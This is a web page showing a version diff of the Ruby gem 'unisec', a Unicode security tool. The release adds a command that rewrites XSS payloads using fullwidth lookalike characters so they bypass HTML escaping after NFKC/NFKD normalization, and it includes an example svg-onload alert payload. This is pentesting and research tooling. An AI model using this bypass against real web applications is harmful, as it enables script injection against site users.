RubyGems - unisec - Versions diffs - 0.0.5 → 0.0.6 - Mend

unisec 0.0.5 → 0.0.6

Files changed (6) hide show

checksums.yaml +4 -4
data/lib/unisec/cli/cli.rb +2 -1
data/lib/unisec/cli/normalization.rb +71 -39
data/lib/unisec/normalization.rb +43 -0
data/lib/unisec/version.rb +1 -1
metadata +2 -2

checksums.yaml CHANGED Viewed

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 0b6f74de3dc3d0f9aebac59ff68bc5731b7185e9e73e86e87477c23408900452
-  data.tar.gz: 910be7b95b71022f352cc6d612c7752fe2ea13a0e6e3dc89aca4566cb1879569
+  metadata.gz: 60d2859aca7324908f4894b8ca2cc99b145657e7ea68fbc51e11a1e787886a57
+  data.tar.gz: 4c426795faa520f02daec94f1cf14379a4a994a0902cc52640e2a358b210c28b
 SHA512:
-  metadata.gz: 47b730a884a30979be5968d90a30bc214ec93725383f20c48a02ec1090ce64e6043f95427c7ed79ebc31b3b4e1d3b66e01c7b0d63f936793f6c8eb008ce5f9fe
-  data.tar.gz: be9ca5cc40baaf9cd56141a3a8e41f5709c6071d5e7797ebd64a1daf231671e6835c168bce53f540e72ead4f68fc93bfd2d211764ba474e1cd8a4ca1bf5e7a65
+  metadata.gz: 8d5c67bf6bc1e76253971cc4b3bdccc513fb13fd3d3fa2dcdffa97329e09b45654b2f2f0a2c734e54c87bcffdb71adfa392a352ec757b6de0f761feaa8b73d28
+  data.tar.gz: 7be763bb5b2adb2139771c3e3f789c101f884209c7ca7e5488df18e97c6cac25578b11c34b451efaddeb11a9926fefeb935857da32a33e3de192b0e39cb46532

data/lib/unisec/cli/cli.rb CHANGED Viewed

@@ -24,7 +24,8 @@ module Unisec
       register 'confusables randomize', Confusables::Randomize
       register 'grep', Grep
       register 'hexdump', Hexdump
-      register 'normalize', Normalize
+      register 'normalize all', Normalize::All
+      register 'normalize replace', Normalize::Replace
       register 'properties char', Properties::Char
       register 'properties codepoints', Properties::Codepoints
       register 'properties list', Properties::List

data/lib/unisec/cli/normalization.rb CHANGED Viewed

@@ -8,45 +8,77 @@ module Unisec
   module CLI
     module Commands
       # CLI sub-commands `unisec normalize xxx` for the class {Unisec::Normalization} from the lib.
-      #
-      # Command `unisec normalize "example"`
-      #
-      # Example:
-      #
-      # ```plaintext
-      # ➜ unisec normalize ẛ̣
-      # Original: ẛ̣
-      #   U+1E9B U+0323
-      # NFC: ẛ̣
-      #   U+1E9B U+0323
-      # NFKC: ṩ
-      #   U+1E69
-      # NFD: ẛ̣
-      #   U+017F U+0323 U+0307
-      # NFKD: ṩ
-      #   U+0073 U+0323 U+0307
-      #
-      # ➜ unisec normalize ẛ̣  --form nfkd
-      # ṩ
-      # ```
-      class Normalize < Dry::CLI::Command
-        desc 'Normalize in all forms'
-        argument :input, required: true,
-                         desc: 'String input. Read from STDIN if equal to -.'
-        option :form, default: nil, values: %w[nfc nfkc nfd nfkd],
-                      desc: 'Output only in the specified normalization form.'
-        # Normalize in all forms
-        # @param input [String] Input string to normalize
-        def call(input: nil, **options)
-          input = $stdin.read.chomp if input == '-'
-          if options[:form].nil?
-            puts Unisec::Normalization.new(input).display
-          else
-            # using send() is safe here thanks to the value whitelist
-            puts Unisec::Normalization.send(options[:form], input)
+      module Normalize
+        # Command `unisec normalize all "example"`
+        #
+        # Example:
+        #
+        # ```plaintext
+        # ➜ unisec normalize all ẛ̣
+        # Original: ẛ̣
+        #   U+1E9B U+0323
+        # NFC: ẛ̣
+        #   U+1E9B U+0323
+        # NFKC: ṩ
+        #   U+1E69
+        # NFD: ẛ̣
+        #   U+017F U+0323 U+0307
+        # NFKD: ṩ
+        #   U+0073 U+0323 U+0307
+        #
+        # ➜ unisec normalize all ẛ̣  --form nfkd
+        # ṩ
+        # ```
+        class All < Dry::CLI::Command
+          desc 'Normalize in all forms'
+          argument :input, required: true,
+                           desc: 'String input. Read from STDIN if equal to -.'
+          option :form, default: nil, values: %w[nfc nfkc nfd nfkd],
+                        desc: 'Output only in the specified normalization form.'
+          # Normalize in all forms
+          # @param input [String] Input string to normalize
+          def call(input: nil, **options)
+            input = $stdin.read.chomp if input == '-'
+            if options[:form].nil?
+              puts Unisec::Normalization.new(input).display
+            else
+              # using send() is safe here thanks to the value whitelist
+              puts Unisec::Normalization.send(options[:form], input)
+            end
+          end
+        end
+        # Command `unisec normalize replace "example"`
+        #
+        # Example:
+        #
+        # ```plaintext
+        # ➜ unisec normalize replace "<svg onload=\"alert('XSS')\">"
+        # Original: <svg onload="alert('XSS')">
+        #   U+003C U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+0022 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+0027 U+0058 U+0053 U+0053 U+0027 U+0029 U+0022 U+003E
+        # Bypass payload: ﹤svg onload=＂alert(＇XSS＇)＂﹥
+        #   U+FE64 U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+FF02 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+FF07 U+0058 U+0053 U+0053 U+FF07 U+0029 U+FF02 U+FE65
+        # NFKC: <svg onload="alert('XSS')">
+        #   U+003C U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+0022 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+0027 U+0058 U+0053 U+0053 U+0027 U+0029 U+0022 U+003E
+        # NFKD: <svg onload="alert('XSS')">
+        #   U+003C U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+0022 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+0027 U+0058 U+0053 U+0053 U+0027 U+0029 U+0022 U+003E
+        #
+        # ➜ echo -n "<svg onload=\"alert('XSS')\">" | unisec normalize replace -
+        # ```
+        class Replace < Dry::CLI::Command
+          desc 'Prepare a XSS payload for HTML escape bypass (HTML escape followed by NFKC / NFKD normalization)'
+          argument :input, required: true,
+                           desc: 'String input. Read from STDIN if equal to -.'
+          # Prepare a XSS payload for HTML escape bypass (HTML escape followed by NFKC / NFKD normalization)
+          # @param input [String] Input string to normalize
+          def call(input: nil, **_options)
+            input = $stdin.read.chomp if input == '-'
+            puts Unisec::Normalization.new(input).display_replace
           end
         end
       end

data/lib/unisec/normalization.rb CHANGED Viewed

@@ -5,6 +5,16 @@ require 'ctf_party'
 module Unisec
   # Normalization Forms
   class Normalization
+    # HTML escapable characters mapped with their Unicode counterparts that will
+    # cast to themself after applying normalization forms using compatibility mode.
+    HTML_ESCAPE_BYPASS = {
+      '<' => ['﹤', '＜'],
+      '>' => ['﹥', '＞'],
+      '"' => ['＂'],
+      "'" => ['＇'],
+      '&' => ['﹠', '＆']
+    }.freeze
     # Original input
     # @return [String] untouched input
     attr_reader :original
@@ -64,6 +74,25 @@ module Unisec
       str.unicode_normalize(:nfkd)
     end
+    # Replace HTML escapable characters with their Unicode counterparts that will
+    # cast to themself after applying normalization forms using compatibility mode.
+    # Usefull for XSS, to bypass HTML escape.
+    # If several values are possible, one is picked randomly.
+    # @param str [String] the target string
+    # @return [String] escaped input
+    def self.replace_bypass(str)
+      str = str.dup
+      HTML_ESCAPE_BYPASS.each do |k, v|
+        str.gsub!(k, v.sample)
+      end
+      str
+    end
+    # Instance version of {Normalization.replace_bypass}.
+    def replace_bypass
+      Normalization.replace_bypass(@original)
+    end
     # Display a CLI-friendly output summurizing all normalization forms
     # @return [String] CLI-ready output
     # @example
@@ -90,5 +119,19 @@ module Unisec
         colorize.call('NFD', @nfd) +
         colorize.call('NFKD', @nfkd)
     end
+    # Display a CLI-friendly output of the XSS payload to bypass HTML escape and
+    # what it does once normalized in NFKC & NFKD.
+    def display_replace
+      colorize = lambda { |form_title, form_attr|
+        "#{Paint[form_title.to_s, :underline,
+                 :bold]}: #{form_attr}\n  #{Paint[Unisec::Properties.chars2codepoints(form_attr), :red]}\n"
+      }
+      payload = replace_bypass
+      colorize.call('Original', @original) +
+        colorize.call('Bypass payload', payload) +
+        colorize.call('NFKC', Normalization.nfkc(payload)) +
+        colorize.call('NFKD', Normalization.nfkd(payload))
+    end
   end
 end

data/lib/unisec/version.rb CHANGED Viewed

@@ -2,5 +2,5 @@
 module Unisec
   # Version of unisec library and app
-  VERSION = '0.0.5'
+  VERSION = '0.0.6'
 end

metadata CHANGED Viewed

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: unisec
 version: !ruby/object:Gem::Version
-  version: 0.0.5
+  version: 0.0.6
 platform: ruby
 authors:
 - Alexandre ZANNI
 autorequire:
 bindir: bin
 cert_chain: []
-date: 2024-02-16 00:00:00.000000000 Z
+date: 2024-05-17 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: ctf-party